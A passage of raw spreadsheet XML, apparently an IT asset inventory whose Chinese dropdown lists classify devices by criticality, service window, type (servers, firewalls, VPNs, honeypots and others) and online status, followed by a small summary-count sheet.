      <c r="AA2450" s="42" t="s">
        <v>434</v>
      </c>
      <c r="AB2450" s="46"/>
      <c r="AC2450" s="46"/>
      <c r="AD2450" s="46"/>
      <c r="AE2450" s="46"/>
      <c r="AF2450" s="42" t="s">
        <v>434</v>
      </c>
      <c r="AG2450" s="47" t="s">
        <v>435</v>
      </c>
      <c r="AH2450" s="42" t="s">
        <v>436</v>
      </c>
      <c r="AI2450" s="46"/>
      <c r="AJ2450" s="46"/>
    </row>
    <row r="2451" spans="1:36">
      <c r="A2451" s="42">
        <v>2450</v>
      </c>
      <c r="B2451" s="42" t="s">
        <v>3603</v>
      </c>
      <c r="C2451" s="42" t="s">
        <v>3604</v>
      </c>
      <c r="D2451" s="42" t="s">
        <v>430</v>
      </c>
      <c r="E2451" s="42" t="s">
        <v>414</v>
      </c>
      <c r="F2451" s="43" t="s">
        <v>121</v>
      </c>
      <c r="G2451" s="46"/>
      <c r="H2451" s="46"/>
      <c r="I2451" s="46"/>
      <c r="J2451" s="42" t="s">
        <v>3605</v>
      </c>
      <c r="K2451" s="42" t="s">
        <v>814</v>
      </c>
      <c r="L2451" s="42" t="s">
        <v>415</v>
      </c>
      <c r="M2451" s="42" t="s">
        <v>3606</v>
      </c>
      <c r="N2451" s="42" t="s">
        <v>3482</v>
      </c>
      <c r="O2451" s="46"/>
      <c r="P2451" s="42" t="s">
        <v>654</v>
      </c>
      <c r="Q2451" s="46"/>
      <c r="R2451" s="46"/>
      <c r="S2451" s="46"/>
      <c r="T2451" s="42" t="s">
        <v>400</v>
      </c>
      <c r="U2451" s="46"/>
      <c r="V2451" s="46"/>
      <c r="W2451" s="42" t="s">
        <v>639</v>
      </c>
      <c r="X2451" s="46"/>
      <c r="Y2451" s="42" t="s">
        <v>509</v>
      </c>
      <c r="Z2451" s="46"/>
      <c r="AA2451" s="42" t="s">
        <v>434</v>
      </c>
      <c r="AB2451" s="46"/>
      <c r="AC2451" s="46"/>
      <c r="AD2451" s="46"/>
      <c r="AE2451" s="46"/>
      <c r="AF2451" s="42" t="s">
        <v>434</v>
      </c>
      <c r="AG2451" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH2451" s="46"/>
      <c r="AI2451" s="46"/>
      <c r="AJ2451" s="46"/>
    </row>
    <row r="2452" spans="1:36">
      <c r="A2452" s="42">
        <v>2451</v>
      </c>
      <c r="B2452" s="42" t="s">
        <v>3607</v>
      </c>
      <c r="C2452" s="42" t="s">
        <v>3608</v>
      </c>
      <c r="D2452" s="42" t="s">
        <v>430</v>
      </c>
      <c r="E2452" s="42" t="s">
        <v>414</v>
      </c>
      <c r="F2452" s="43" t="s">
        <v>121</v>
      </c>
      <c r="G2452" s="46"/>
      <c r="H2452" s="46"/>
      <c r="I2452" s="46"/>
      <c r="J2452" s="42" t="s">
        <v>3609</v>
      </c>
      <c r="K2452" s="42" t="s">
        <v>814</v>
      </c>
      <c r="L2452" s="42" t="s">
        <v>415</v>
      </c>
      <c r="M2452" s="42" t="s">
        <v>3610</v>
      </c>
      <c r="N2452" s="42" t="s">
        <v>3482</v>
      </c>
      <c r="O2452" s="46"/>
      <c r="P2452" s="42" t="s">
        <v>654</v>
      </c>
      <c r="Q2452" s="46"/>
      <c r="R2452" s="46"/>
      <c r="S2452" s="46"/>
      <c r="T2452" s="42" t="s">
        <v>400</v>
      </c>
      <c r="U2452" s="46"/>
      <c r="V2452" s="46"/>
      <c r="W2452" s="42" t="s">
        <v>639</v>
      </c>
      <c r="X2452" s="46"/>
      <c r="Y2452" s="42" t="s">
        <v>509</v>
      </c>
      <c r="Z2452" s="46"/>
      <c r="AA2452" s="42" t="s">
        <v>434</v>
      </c>
      <c r="AB2452" s="46"/>
      <c r="AC2452" s="46"/>
      <c r="AD2452" s="46"/>
      <c r="AE2452" s="46"/>
      <c r="AF2452" s="42" t="s">
        <v>434</v>
      </c>
      <c r="AG2452" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH2452" s="46"/>
      <c r="AI2452" s="46"/>
      <c r="AJ2452" s="46"/>
    </row>
    <row r="2453" spans="1:36">
      <c r="A2453" s="42">
        <v>2452</v>
      </c>
      <c r="B2453" s="42" t="s">
        <v>3611</v>
      </c>
      <c r="C2453" s="42" t="s">
        <v>3612</v>
      </c>
      <c r="D2453" s="42" t="s">
        <v>430</v>
      </c>
      <c r="E2453" s="42" t="s">
        <v>414</v>
      </c>
      <c r="F2453" s="43" t="s">
        <v>121</v>
      </c>
      <c r="G2453" s="46"/>
      <c r="H2453" s="46"/>
      <c r="I2453" s="46"/>
      <c r="J2453" s="42" t="s">
        <v>3613</v>
      </c>
      <c r="K2453" s="42" t="s">
        <v>814</v>
      </c>
      <c r="L2453" s="42" t="s">
        <v>415</v>
      </c>
      <c r="M2453" s="42" t="s">
        <v>3614</v>
      </c>
      <c r="N2453" s="42" t="s">
        <v>789</v>
      </c>
      <c r="O2453" s="42" t="s">
        <v>556</v>
      </c>
      <c r="P2453" s="42" t="s">
        <v>3615</v>
      </c>
      <c r="Q2453" s="46"/>
      <c r="R2453" s="42" t="s">
        <v>3616</v>
      </c>
      <c r="S2453" s="46"/>
      <c r="T2453" s="42" t="s">
        <v>400</v>
      </c>
      <c r="U2453" s="46"/>
      <c r="V2453" s="46"/>
      <c r="W2453" s="46"/>
      <c r="X2453" s="46"/>
      <c r="Y2453" s="46"/>
      <c r="Z2453" s="46"/>
      <c r="AA2453" s="42" t="s">
        <v>434</v>
      </c>
      <c r="AB2453" s="46"/>
      <c r="AC2453" s="46"/>
      <c r="AD2453" s="46"/>
      <c r="AE2453" s="46"/>
      <c r="AF2453" s="42" t="s">
        <v>434</v>
      </c>
      <c r="AG2453" s="47" t="s">
        <v>435</v>
      </c>
      <c r="AH2453" s="42" t="s">
        <v>791</v>
      </c>
      <c r="AI2453" s="46"/>
      <c r="AJ2453" s="46"/>
    </row>
    <row r="2454" spans="1:36">
      <c r="A2454" s="42">
        <v>2453</v>
      </c>
      <c r="B2454" s="42" t="s">
        <v>3617</v>
      </c>
      <c r="C2454" s="42" t="s">
        <v>3618</v>
      </c>
      <c r="D2454" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E2454" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F2454" s="43" t="s">
        <v>127</v>
      </c>
      <c r="G2454" s="46"/>
      <c r="H2454" s="46"/>
      <c r="I2454" s="46"/>
      <c r="J2454" s="46"/>
      <c r="K2454" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L2454" s="46"/>
      <c r="M2454" s="42" t="s">
        <v>1623</v>
      </c>
      <c r="N2454" s="42" t="s">
        <v>373</v>
      </c>
      <c r="O2454" s="46"/>
      <c r="P2454" s="46"/>
      <c r="Q2454" s="46"/>
      <c r="R2454" s="42" t="s">
        <v>1624</v>
      </c>
      <c r="S2454" s="46"/>
      <c r="T2454" s="42" t="s">
        <v>400</v>
      </c>
      <c r="U2454" s="46"/>
      <c r="V2454" s="46"/>
      <c r="W2454" s="42" t="s">
        <v>1625</v>
      </c>
      <c r="X2454" s="46"/>
      <c r="Y2454" s="42" t="s">
        <v>455</v>
      </c>
      <c r="Z2454" s="46"/>
      <c r="AA2454" s="42" t="s">
        <v>434</v>
      </c>
      <c r="AB2454" s="46"/>
      <c r="AC2454" s="46"/>
      <c r="AD2454" s="46"/>
      <c r="AE2454" s="46"/>
      <c r="AF2454" s="42" t="s">
        <v>434</v>
      </c>
      <c r="AG2454" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH2454" s="46"/>
      <c r="AI2454" s="46"/>
      <c r="AJ2454" s="46"/>
    </row>
    <row r="2455" spans="1:36">
      <c r="A2455" s="42">
        <v>2454</v>
      </c>
      <c r="B2455" s="42" t="s">
        <v>3619</v>
      </c>
      <c r="C2455" s="42" t="s">
        <v>3620</v>
      </c>
      <c r="D2455" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E2455" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F2455" s="43" t="s">
        <v>423</v>
      </c>
      <c r="G2455" s="46"/>
      <c r="H2455" s="46"/>
      <c r="I2455" s="46"/>
      <c r="J2455" s="46"/>
      <c r="K2455" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L2455" s="46"/>
      <c r="M2455" s="42" t="s">
        <v>424</v>
      </c>
      <c r="N2455" s="42" t="s">
        <v>373</v>
      </c>
      <c r="O2455" s="46"/>
      <c r="P2455" s="42" t="s">
        <v>425</v>
      </c>
      <c r="Q2455" s="46"/>
      <c r="R2455" s="42" t="s">
        <v>426</v>
      </c>
      <c r="S2455" s="46"/>
      <c r="T2455" s="42" t="s">
        <v>400</v>
      </c>
      <c r="U2455" s="46"/>
      <c r="V2455" s="46"/>
      <c r="W2455" s="42" t="s">
        <v>425</v>
      </c>
      <c r="X2455" s="46"/>
      <c r="Y2455" s="42" t="s">
        <v>427</v>
      </c>
      <c r="Z2455" s="46"/>
      <c r="AA2455" s="42" t="s">
        <v>434</v>
      </c>
      <c r="AB2455" s="46"/>
      <c r="AC2455" s="46"/>
      <c r="AD2455" s="46"/>
      <c r="AE2455" s="46"/>
      <c r="AF2455" s="42" t="s">
        <v>434</v>
      </c>
      <c r="AG2455" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH2455" s="46"/>
      <c r="AI2455" s="46"/>
      <c r="AJ2455" s="46"/>
    </row>
    <row r="2456" spans="1:36">
      <c r="A2456" s="42">
        <v>2455</v>
      </c>
      <c r="B2456" s="42" t="s">
        <v>3621</v>
      </c>
      <c r="C2456" s="42" t="s">
        <v>3622</v>
      </c>
      <c r="D2456" s="42" t="s">
        <v>430</v>
      </c>
      <c r="E2456" s="42" t="s">
        <v>414</v>
      </c>
      <c r="F2456" s="43" t="s">
        <v>121</v>
      </c>
      <c r="G2456" s="46"/>
      <c r="H2456" s="46"/>
      <c r="I2456" s="46"/>
      <c r="J2456" s="46"/>
      <c r="K2456" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L2456" s="42" t="s">
        <v>415</v>
      </c>
      <c r="M2456" s="42" t="s">
        <v>3623</v>
      </c>
      <c r="N2456" s="42" t="s">
        <v>789</v>
      </c>
      <c r="O2456" s="46"/>
      <c r="P2456" s="42" t="s">
        <v>711</v>
      </c>
      <c r="Q2456" s="42" t="s">
        <v>3624</v>
      </c>
      <c r="R2456" s="46"/>
      <c r="S2456" s="46"/>
      <c r="T2456" s="42" t="s">
        <v>400</v>
      </c>
      <c r="U2456" s="46"/>
      <c r="V2456" s="46"/>
      <c r="W2456" s="46"/>
      <c r="X2456" s="46"/>
      <c r="Y2456" s="46"/>
      <c r="Z2456" s="46"/>
      <c r="AA2456" s="42" t="s">
        <v>434</v>
      </c>
      <c r="AB2456" s="46"/>
      <c r="AC2456" s="46"/>
      <c r="AD2456" s="46"/>
      <c r="AE2456" s="46"/>
      <c r="AF2456" s="42" t="s">
        <v>434</v>
      </c>
      <c r="AG2456" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH2456" s="46"/>
      <c r="AI2456" s="46"/>
      <c r="AJ2456" s="46"/>
    </row>
    <row r="2457" spans="1:36">
      <c r="A2457" s="42">
        <v>2456</v>
      </c>
      <c r="B2457" s="42" t="s">
        <v>3625</v>
      </c>
      <c r="C2457" s="42" t="s">
        <v>3626</v>
      </c>
      <c r="D2457" s="42" t="s">
        <v>430</v>
      </c>
      <c r="E2457" s="42" t="s">
        <v>414</v>
      </c>
      <c r="F2457" s="43" t="s">
        <v>121</v>
      </c>
      <c r="G2457" s="46"/>
      <c r="H2457" s="46"/>
      <c r="I2457" s="46"/>
      <c r="J2457" s="46"/>
      <c r="K2457" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L2457" s="42" t="s">
        <v>415</v>
      </c>
      <c r="M2457" s="42" t="s">
        <v>3627</v>
      </c>
      <c r="N2457" s="42" t="s">
        <v>3482</v>
      </c>
      <c r="O2457" s="42" t="s">
        <v>3628</v>
      </c>
      <c r="P2457" s="42" t="s">
        <v>3629</v>
      </c>
      <c r="Q2457" s="46"/>
      <c r="R2457" s="42" t="s">
        <v>632</v>
      </c>
      <c r="S2457" s="46"/>
      <c r="T2457" s="42" t="s">
        <v>400</v>
      </c>
      <c r="U2457" s="46"/>
      <c r="V2457" s="46"/>
      <c r="W2457" s="46"/>
      <c r="X2457" s="46"/>
      <c r="Y2457" s="46"/>
      <c r="Z2457" s="46"/>
      <c r="AA2457" s="42" t="s">
        <v>434</v>
      </c>
      <c r="AB2457" s="46"/>
      <c r="AC2457" s="46"/>
      <c r="AD2457" s="46"/>
      <c r="AE2457" s="46"/>
      <c r="AF2457" s="42" t="s">
        <v>434</v>
      </c>
      <c r="AG2457" s="47" t="s">
        <v>435</v>
      </c>
      <c r="AH2457" s="42" t="s">
        <v>436</v>
      </c>
      <c r="AI2457" s="46"/>
      <c r="AJ2457" s="46"/>
    </row>
    <row r="2458" spans="1:36">
      <c r="A2458" s="42">
        <v>2457</v>
      </c>
      <c r="B2458" s="42" t="s">
        <v>3630</v>
      </c>
      <c r="C2458" s="42" t="s">
        <v>3631</v>
      </c>
      <c r="D2458" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E2458" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F2458" s="43" t="s">
        <v>125</v>
      </c>
      <c r="G2458" s="46"/>
      <c r="H2458" s="46"/>
      <c r="I2458" s="46"/>
      <c r="J2458" s="46"/>
      <c r="K2458" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L2458" s="46"/>
      <c r="M2458" s="42" t="s">
        <v>3632</v>
      </c>
      <c r="N2458" s="42" t="s">
        <v>373</v>
      </c>
      <c r="O2458" s="46"/>
      <c r="P2458" s="46"/>
      <c r="Q2458" s="46"/>
      <c r="R2458" s="46"/>
      <c r="S2458" s="46"/>
      <c r="T2458" s="42" t="s">
        <v>400</v>
      </c>
      <c r="U2458" s="46"/>
      <c r="V2458" s="46"/>
      <c r="W2458" s="46"/>
      <c r="X2458" s="46"/>
      <c r="Y2458" s="46"/>
      <c r="Z2458" s="46"/>
      <c r="AA2458" s="42" t="s">
        <v>434</v>
      </c>
      <c r="AB2458" s="46"/>
      <c r="AC2458" s="46"/>
      <c r="AD2458" s="46"/>
      <c r="AE2458" s="46"/>
      <c r="AF2458" s="42" t="s">
        <v>434</v>
      </c>
      <c r="AG2458" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH2458" s="46"/>
      <c r="AI2458" s="46"/>
      <c r="AJ2458" s="46"/>
    </row>
    <row r="2459" spans="1:36">
      <c r="A2459" s="42">
        <v>2458</v>
      </c>
      <c r="B2459" s="42" t="s">
        <v>3633</v>
      </c>
      <c r="C2459" s="42" t="s">
        <v>3634</v>
      </c>
      <c r="D2459" s="42" t="s">
        <v>430</v>
      </c>
      <c r="E2459" s="42" t="s">
        <v>414</v>
      </c>
      <c r="F2459" s="43" t="s">
        <v>121</v>
      </c>
      <c r="G2459" s="46"/>
      <c r="H2459" s="46"/>
      <c r="I2459" s="46"/>
      <c r="J2459" s="42" t="s">
        <v>3587</v>
      </c>
      <c r="K2459" s="42" t="s">
        <v>814</v>
      </c>
      <c r="L2459" s="42" t="s">
        <v>415</v>
      </c>
      <c r="M2459" s="42" t="s">
        <v>3588</v>
      </c>
      <c r="N2459" s="42" t="s">
        <v>373</v>
      </c>
      <c r="O2459" s="42" t="s">
        <v>433</v>
      </c>
      <c r="P2459" s="46"/>
      <c r="Q2459" s="46"/>
      <c r="R2459" s="46"/>
      <c r="S2459" s="46"/>
      <c r="T2459" s="42" t="s">
        <v>400</v>
      </c>
      <c r="U2459" s="42" t="s">
        <v>814</v>
      </c>
      <c r="V2459" s="46"/>
      <c r="W2459" s="46"/>
      <c r="X2459" s="46"/>
      <c r="Y2459" s="46"/>
      <c r="Z2459" s="46"/>
      <c r="AA2459" s="42" t="s">
        <v>434</v>
      </c>
      <c r="AB2459" s="46"/>
      <c r="AC2459" s="46"/>
      <c r="AD2459" s="46"/>
      <c r="AE2459" s="46"/>
      <c r="AF2459" s="42" t="s">
        <v>434</v>
      </c>
      <c r="AG2459" s="47" t="s">
        <v>435</v>
      </c>
      <c r="AH2459" s="42" t="s">
        <v>791</v>
      </c>
      <c r="AI2459" s="46"/>
      <c r="AJ2459" s="46"/>
    </row>
    <row r="2460" spans="1:36">
      <c r="A2460" s="42">
        <v>2459</v>
      </c>
      <c r="B2460" s="42" t="s">
        <v>3635</v>
      </c>
      <c r="C2460" s="42" t="s">
        <v>3636</v>
      </c>
      <c r="D2460" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E2460" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F2460" s="43" t="s">
        <v>125</v>
      </c>
      <c r="G2460" s="46"/>
      <c r="H2460" s="46"/>
      <c r="I2460" s="46"/>
      <c r="J2460" s="46"/>
      <c r="K2460" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L2460" s="46"/>
      <c r="M2460" s="42" t="s">
        <v>3632</v>
      </c>
      <c r="N2460" s="42" t="s">
        <v>373</v>
      </c>
      <c r="O2460" s="46"/>
      <c r="P2460" s="46"/>
      <c r="Q2460" s="46"/>
      <c r="R2460" s="46"/>
      <c r="S2460" s="46"/>
      <c r="T2460" s="42" t="s">
        <v>400</v>
      </c>
      <c r="U2460" s="46"/>
      <c r="V2460" s="46"/>
      <c r="W2460" s="46"/>
      <c r="X2460" s="46"/>
      <c r="Y2460" s="46"/>
      <c r="Z2460" s="46"/>
      <c r="AA2460" s="42" t="s">
        <v>434</v>
      </c>
      <c r="AB2460" s="46"/>
      <c r="AC2460" s="46"/>
      <c r="AD2460" s="46"/>
      <c r="AE2460" s="46"/>
      <c r="AF2460" s="42" t="s">
        <v>434</v>
      </c>
      <c r="AG2460" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH2460" s="46"/>
      <c r="AI2460" s="46"/>
      <c r="AJ2460" s="46"/>
    </row>
    <row r="2461" spans="1:36">
      <c r="A2461" s="42">
        <v>2460</v>
      </c>
      <c r="B2461" s="42" t="s">
        <v>3637</v>
      </c>
      <c r="C2461" s="42" t="s">
        <v>3638</v>
      </c>
      <c r="D2461" s="42" t="s">
        <v>430</v>
      </c>
      <c r="E2461" s="42" t="s">
        <v>414</v>
      </c>
      <c r="F2461" s="43" t="s">
        <v>121</v>
      </c>
      <c r="G2461" s="46"/>
      <c r="H2461" s="46"/>
      <c r="I2461" s="46"/>
      <c r="J2461" s="46"/>
      <c r="K2461" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L2461" s="42" t="s">
        <v>415</v>
      </c>
      <c r="M2461" s="46"/>
      <c r="N2461" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O2461" s="46"/>
      <c r="P2461" s="46"/>
      <c r="Q2461" s="46"/>
      <c r="R2461" s="46"/>
      <c r="S2461" s="46"/>
      <c r="T2461" s="42" t="s">
        <v>400</v>
      </c>
      <c r="U2461" s="46"/>
      <c r="V2461" s="46"/>
      <c r="W2461" s="46"/>
      <c r="X2461" s="46"/>
      <c r="Y2461" s="46"/>
      <c r="Z2461" s="46"/>
      <c r="AA2461" s="42" t="s">
        <v>434</v>
      </c>
      <c r="AB2461" s="46"/>
      <c r="AC2461" s="46"/>
      <c r="AD2461" s="46"/>
      <c r="AE2461" s="46"/>
      <c r="AF2461" s="42" t="s">
        <v>434</v>
      </c>
      <c r="AG2461" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH2461" s="46"/>
      <c r="AI2461" s="46"/>
      <c r="AJ2461" s="46"/>
    </row>
  </sheetData>
  <autoFilter xmlns:etc="http://www.wps.cn/officeDocument/2017/etCustomData" ref="A1:AJ2461" etc:filterBottomFollowUsedRange="0">
    <extLst/>
  </autoFilter>
  <dataValidations count="6">
    <dataValidation showInputMessage="1" showErrorMessage="1" errorTitle="输入错误" error="请输入正确的资产标签 " sqref="L1"/>
    <dataValidation type="list" showInputMessage="1" showErrorMessage="1" sqref="D2:D2461">
      <formula1>"核心,重要,一般"</formula1>
    </dataValidation>
    <dataValidation type="list" showInputMessage="1" showErrorMessage="1" sqref="E2:E2461">
      <formula1>"服务内(7*24H),服务内(5*8H),服务外"</formula1>
    </dataValidation>
    <dataValidation type="list" showInputMessage="1" showErrorMessage="1" sqref="F2:F2461">
      <formula1>"终端,服务器,网络设备,安全设备,物联网设备,防火墙,VPN,WAF,IDPS,蜜罐,扫描器,DNS,代理服务器,堡垒机"</formula1>
    </dataValidation>
    <dataValidation type="list" showInputMessage="1" showErrorMessage="1" sqref="K2:K2461">
      <formula1>"在线,离线"</formula1>
    </dataValidation>
    <dataValidation type="list" showInputMessage="1" showErrorMessage="1" sqref="T2:T2461">
      <formula1>"是,否"</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J9" sqref="J9"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.89814814814815" defaultRowHeight="14.4" outlineLevelCol="5"/>
  <cols>
    <col min="2" max="2" width="19.5555555555556" customWidth="1"/>
    <col min="3" max="3" width="13" style="33" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" s="32" customFormat="1" ht="18" customHeight="1" spans="1:6">
      <c r="A1" s="34" t="s">
        <v>3639</v>
      </c>
      <c r="B1" s="34" t="s">
        <v>3640</v>
      </c>
      <c r="C1" s="34" t="s">
        <v>3641</v>
      </c>
      <c r="D1" s="34" t="s">
        <v>3642</v>
      </c>
      <c r="E1" s="34" t="s">
        <v>147</v>
      </c>
      <c r="F1" s="34" t="s">
        <v>3643</v>
      </c>
    </row>
    <row r="2" s="32" customFormat="1" ht="18" customHeight="1" spans="1:6">
      <c r="A2" s="35" t="s">
        <v>234</v>
      </c>
      <c r="B2" s="35" t="s">
        <v>3644</v>
      </c>
      <c r="C2" s="35" t="s">
        <v>3645</v>
      </c>
      <c r="D2" s="35" t="s">
        <v>3646</v>
      </c>
      <c r="E2" s="35">
        <v>1</v>
      </c>
      <c r="F2" s="35">
        <v>0</v>
      </c>
    </row>
    <row r="3" s="32" customFormat="1" ht="18" customHeight="1" spans="1:6">
      <c r="A3" s="35"/>
      <c r="B3" s="35"/>
      <c r="C3" s="35"/>
      <c r="D3" s="35" t="s">
        <v>3647</v>
      </c>
      <c r="E3" s="35">
        <v>7</v>
      </c>
      <c r="F3" s="35">
        <v>0</v>
      </c>
    </row>
    <row r="4" s="32" customFormat="1" ht="18" customHeight="1" spans="1:6">
      <c r="A4" s="35"/>
      <c r="B4" s="35"/>
      <c r="C4" s="35" t="s">
        <v>3648</v>
      </c>
      <c r="D4" s="35" t="s">
        <v>3648</v>
      </c>
      <c r="E4" s="35">
        <v>3</v>
      </c>
      <c r="F4" s="35">
        <v>2</v>
      </c>
    </row>
    <row r="5" s="32" customFormat="1" ht="18" customHeight="1" spans="1:6">
      <c r="A5" s="35"/>
      <c r="B5" s="35"/>
      <c r="C5" s="35" t="s">
        <v>3649</v>
      </c>
      <c r="D5" s="35" t="s">
        <v>3649</v>
      </c>
      <c r="E5" s="35">
        <v>27</v>
      </c>
      <c r="F5" s="35">
        <v>26</v>
      </c>
    </row>
    <row r="6" s="32" customFormat="1" ht="18" customHeight="1" spans="1:6">
      <c r="A6" s="35"/>
      <c r="B6" s="35"/>
      <c r="C6" s="35" t="s">
        <v>3650</v>
      </c>
      <c r="D6" s="35" t="s">
        <v>3650</v>
      </c>
      <c r="E6" s="35">
        <v>20</v>
      </c>
      <c r="F6" s="35">
        <v>19</v>
      </c>
    </row>
    <row r="7" s="32" customFormat="1" ht="18" customHeight="1" spans="1:6">
      <c r="A7" s="35"/>
      <c r="B7" s="35"/>
      <c r="C7" s="35" t="s">
        <v>3651</v>
      </c>
      <c r="D7" s="35" t="s">
        <v>3651</v>
      </c>
      <c r="E7" s="35">
        <v>7</v>
      </c>
      <c r="F7" s="35">
        <v>7</v>
      </c>
    </row>
    <row r="8" s="32" customFormat="1" ht="18" customHeight="1" spans="1:6">
      <c r="A8" s="35"/>
      <c r="B8" s="35"/>
      <c r="C8" s="35" t="s">
        <v>3652</v>
      </c>
      <c r="D8" s="35" t="s">
        <v>3652</v>
      </c>
      <c r="E8" s="35">
        <v>4</v>
      </c>
      <c r="F8" s="35">
        <v>4</v>
      </c>
    </row>
    <row r="9" s="32" customFormat="1" ht="18" customHeight="1" spans="1:6">
      <c r="A9" s="35"/>
      <c r="B9" s="35"/>
      <c r="C9" s="35" t="s">
        <v>3653</v>
      </c>
      <c r="D9" s="35" t="s">
        <v>3653</v>
      </c>
      <c r="E9" s="35">
        <v>0</v>
      </c>
      <c r="F9" s="35">
        <v>0</v>
      </c>
    </row>
    <row r="10" s="32" customFormat="1" ht="18" customHeight="1" spans="1:6">
      <c r="A10" s="35"/>
      <c r="B10" s="35"/>
      <c r="C10" s="35" t="s">
        <v>3654</v>
      </c>
      <c r="D10" s="35" t="s">
        <v>3654</v>
      </c>
      <c r="E10" s="35">
        <v>27</v>
      </c>
      <c r="F10" s="35" t="s">
        <v>3655</v>
      </c>
    </row>
    <row r="11" s="32" customFormat="1" ht="18" customHeight="1" spans="1:6">
      <c r="A11" s="35"/>
      <c r="B11" s="35" t="s">
        <v>3656</v>
      </c>
      <c r="C11" s="35" t="s">
        <v>3657</v>
      </c>
      <c r="D11" s="35" t="s">
        <v>3657</v>
      </c>
      <c r="E11" s="35">
        <v>0</v>
      </c>
      <c r="F11" s="35" t="s">
        <v>3655</v>
      </c>
    </row>
    <row r="12" s="32" customFormat="1" ht="18" customHeight="1" spans="1:6">
      <c r="A12" s="35"/>
      <c r="B12" s="35"/>
      <c r="C12" s="35" t="s">
        <v>3658</v>
      </c>
      <c r="D12" s="35" t="s">
        <v>3658</v>
      </c>
      <c r="E12" s="35">
        <v>0</v>
      </c>
      <c r="F12" s="35" t="s">
        <v>3655</v>
      </c>
    </row>
    <row r="13" s="32" customFormat="1" ht="18" customHeight="1" spans="1:6">
      <c r="A13" s="35"/>
      <c r="B13" s="35"/>
      <c r="C13" s="35" t="s">
        <v>3659</v>
      </c>
      <c r="D13" s="35" t="s">
        <v>3659</v>
      </c>
      <c r="E13" s="35">
        <v>0</v>
      </c>
      <c r="F13" s="35" t="s">
        <v>3655</v>
      </c>
    </row>
  </sheetData>
  <autoFilter xmlns:etc="http://www.wps.cn/officeDocument/2017/etCustomData" ref="A1:F13" etc:filterBottomFollowUsedRange="0">
    <extLst/>
  </autoFilter>
  <mergeCells count="4">
    <mergeCell ref="A2:A13"/>
    <mergeCell ref="B2:B10"/>
    <mergeCell ref="B11:B13"/>
    <mergeCell ref="C2:C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455"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="M6" sqref="M6"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="30" customHeight="1"/>
  <cols>
    <col min="2" max="2" width="14.8981481481481" customWidth="1"/>
    <col min="4" max="4" width="9.66666666666667" customWidth="1"/>
    <col min="7" max="7" width="12.5" customWidth="1"/>
    <col min="8" max="8" width="17.7777777777778" customWidth="1"/>
    <col min="9" max="9" width="15.8611111111111" customWidth="1"/>
    <col min="10" max="11" width="13.8981481481481" style="28" customWidth="1"/>
    <col min="14" max="14" width="10.3055555555556"/>
    <col min="15" max="15" width="13.7777777777778" customWidth="1"/>
    <col min="16" max="16" width="11.8981481481481" customWidth="1"/>
    <col min="19" max="19" width="16.537037037037" style="29" customWidth="1"/>
    <col min="20" max="20" width="17.5555555555556" style="29" customWidth="1"/>
    <col min="21" max="21" width="20.5" customWidth="1"/>
    <col min="22" max="22" width="26.4444444444444" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" customHeight="1" spans="1:23">
      <c r="A1" t="s">
        <v>331</v>
      </c>
      <c r="B1" t="s">
        <v>3660</v>
      </c>
      <c r="C1" t="s">
        <v>3661</v>
      </c>
      <c r="D1" t="s">
        <v>3662</v>
      </c>
      <c r="E1" t="s">
        <v>3663</v>
      </c>
      <c r="F1" t="s">
        <v>3664</v>
      </c>
      <c r="G1" t="s">
        <v>3665</v>
      </c>
      <c r="H1" t="s">
        <v>3666</v>
      </c>
      <c r="I1" t="s">
        <v>3667</v>
      </c>
      <c r="J1" s="28" t="s">
        <v>3668</v>
      </c>
      <c r="K1" s="28" t="s">
        <v>3669</v>
      </c>
      <c r="L1" t="s">
        <v>3670</v>
      </c>
      <c r="M1" t="s">
        <v>3671</v>
      </c>
      <c r="N1" t="s">
        <v>3672</v>
      </c>
      <c r="O1" t="s">
        <v>3673</v>
      </c>
      <c r="P1" t="s">
        <v>3674</v>
      </c>
      <c r="Q1" t="s">
        <v>3675</v>
      </c>
      <c r="R1" t="s">
        <v>3676</v>
      </c>
      <c r="S1" s="30" t="s">
        <v>3677</v>
      </c>
      <c r="T1" s="29" t="s">
        <v>3678</v>
      </c>
      <c r="U1" t="s">
        <v>3679</v>
      </c>
      <c r="V1" t="s">
        <v>3680</v>
      </c>
      <c r="W1" t="s">
        <v>3681</v>
      </c>
    </row>
    <row r="2" customHeight="1" spans="1:23">
      <c r="A2">
        <v>1</v>
      </c>
      <c r="B2" t="s">
        <v>3682</v>
      </c>
      <c r="C2" t="s">
        <v>3683</v>
      </c>
      <c r="D2" t="s">
        <v>3684</v>
      </c>
      <c r="E2" t="s">
        <v>3685</v>
      </c>
      <c r="F2" t="s">
        <v>3686</v>
      </c>
      <c r="G2" t="s">
        <v>3687</v>
      </c>
      <c r="H2" t="s">
        <v>3086</v>
      </c>
      <c r="I2" t="s">
        <v>3688</v>
      </c>
      <c r="J2" s="28" t="s">
        <v>3087</v>
      </c>
      <c r="K2" s="28" t="s">
        <v>3087</v>
      </c>
      <c r="L2" t="s">
        <v>3689</v>
      </c>
      <c r="M2" t="s">
        <v>3690</v>
      </c>
      <c r="N2" s="31" t="str">
